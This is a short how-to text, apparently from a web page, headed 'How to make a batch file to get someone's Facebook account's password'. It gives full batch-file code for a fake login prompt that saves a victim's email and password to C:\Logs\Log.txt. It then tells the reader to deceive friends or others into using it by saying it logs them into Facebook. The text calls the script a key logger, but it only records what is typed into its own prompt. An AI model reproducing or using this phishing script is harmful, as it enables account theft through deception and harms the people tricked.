How to make a batch file to get someone's Facebook account's password
Here we will make a simple key logger which will save a person's account password.
So let's start
1. Open notepad and paste the following code:
@echo off
color a
title login
echo please enter your facebook email address and password
cd "C:\Logs"
set/p user=Username:
set/p pass=Password:
echo Username="%user%"Password="%pass%">Log.txt
start>>Program here<<
2. Now save it as log.bat
3. Make a folder name Logs in C drive
4. To change the file saving location replace C:\Logs with the file location where you want to save the password.
5. Now ask your friends or someone to enter their account and password in it by saying them that it is a software which will
directly log in to their facebook account.
6. After that open the file location which you have set to store the password contained file. Now open the file named Log.txt which contain the password.
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